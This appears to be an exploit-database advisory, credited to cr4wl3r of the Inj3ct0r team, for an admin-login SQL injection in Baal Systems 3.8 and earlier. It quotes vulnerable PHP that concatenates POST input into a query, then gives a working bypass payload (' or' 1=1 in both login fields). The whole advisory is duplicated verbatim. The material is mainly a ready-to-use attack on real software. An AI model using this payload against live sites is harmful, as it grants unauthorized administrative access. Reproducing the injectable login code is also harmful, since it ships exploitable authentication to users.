Baal Systems <= 3.8 (Auth Bypass) SQL Injection Vulnerability

# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0 _ __ __ __ 1
# 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
# 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
# 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
# 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
# 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
# 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
# 1 \ \____/ >> Exploit database separated by exploit 0
# 0 \/___/ type (local, remote, DoS, etc.) 1
# 1 1
# 0 [+] Site : Inj3ct0r.com 0
# 1 [+] Support e-mail : submit[at]inj3ct0r.com 1
# 0 0
# 1 ###################################### 1
# 0 I'm cr4wl3r member from Inj3ct0r Team 1
# 1 ###################################### 0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#[+] Discovered By: cr4wl3r

[+] Vuln Code :

[adminlogin.php]

include("common.php");
if (!empty($_POST['password'])) {
$username = $_POST['username'];
$password = $_POST['password'];

$query = "select * from {$tableprefix}tbluser where username='" . $username . "' and password='" . $password . "' and userrole='admin';";
$result1 = db_query($query);
$rows = db_num_rows($result1);
$row = db_fetch_array($result1);
if ($rows != 0) {
if (session_is_registered("whossession")) {
$_SESSION['who'] = "admin";
$_SESSION['userrole'] = "admin";
$_SESSION['username'] = $username;
$_SESSION['usernum'] = $row["userid"];
header("location:admin.php");
} else {
session_register("whossession");
$_SESSION['who'] = "admin";
$_SESSION['userrole'] = "admin";
$_SESSION['username'] = $username;
$_SESSION['usernum'] = $row["userid"];
header("location:admin.php");
}
} else {
header("location:adminlogin.php?error=yes");
}
} else {

?>

[+] PoC :

[BaalSystems_path]/adminlogin.php


username: ' or' 1=1
Password: ' or' 1=1[+] Baal Systems <= 3.8 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by cr4wl3r

[+] Vuln Code :

[adminlogin.php]

include("common.php");
if (!empty($_POST['password'])) {
$username = $_POST['username'];
$password = $_POST['password'];

$query = "select * from {$tableprefix}tbluser where username='" . $username . "' and password='" . $password . "' and userrole='admin';";
$result1 = db_query($query);
$rows = db_num_rows($result1);
$row = db_fetch_array($result1);
if ($rows != 0) {
if (session_is_registered("whossession")) {
$_SESSION['who'] = "admin";
$_SESSION['userrole'] = "admin";
$_SESSION['username'] = $username;
$_SESSION['usernum'] = $row["userid"];
header("location:admin.php");
} else {
session_register("whossession");
$_SESSION['who'] = "admin";
$_SESSION['userrole'] = "admin";
$_SESSION['username'] = $username;
$_SESSION['usernum'] = $row["userid"];
header("location:admin.php");
}
} else {
header("location:adminlogin.php?error=yes");
}
} else {

?>

[+] PoC :

[BaalSystems_path]/adminlogin.php


username: ' or' 1=1
Password: ' or' 1=1